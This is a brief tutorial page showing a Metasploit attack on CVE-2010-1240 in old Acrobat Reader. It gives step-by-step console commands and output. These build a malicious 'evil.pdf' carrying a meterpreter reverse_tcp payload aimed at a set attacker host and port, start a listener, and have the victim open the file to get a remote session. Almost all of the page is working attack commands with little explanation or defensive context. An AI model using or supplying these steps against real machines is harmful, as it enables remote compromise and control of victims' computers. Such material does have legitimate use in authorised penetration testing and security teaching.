Sample Exploits using Metasploit

Introduction

Metasploit contains browser exploits and modules to perform adversarial attacks.

CVE-2010-1240 (Acrobat Reader)

The vulnerable softwares versions are ADOBE ACROBAT READER UP TO 9.3.0.

1. Create the malicious pdf file

msf6 > set payload windows/meterpreter/reverse_tcp # or any chosen payload
msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > show targets
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set TARGET 0
target => 0
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST <IP>
LHOST => 192.168.0.4
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LPORT <PORT>
LPORT => 9999
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit

[*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
[*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
[*] Using 'windows/x64/meterpreter/reverse_tcp' as payload...
[+] Parsing Successful. Creating 'evil.pdf' file...
[+] evil.pdf stored at /root/.msf4/local/evil.pdf

2. Create and run a listener

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <IP>
msf6 exploit(multi/handler) > set LPORT <PORT>
msf6 exploit(multi/handler) > exploit

3. Run the evil.pdf file on the vulnerable target machine for a session.

Video Demonstration

CVE-2010-1240 (Acrobat Reader)

References

• https://vuldb.com/?id.52579
• https://www.rapid7.com/db/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe/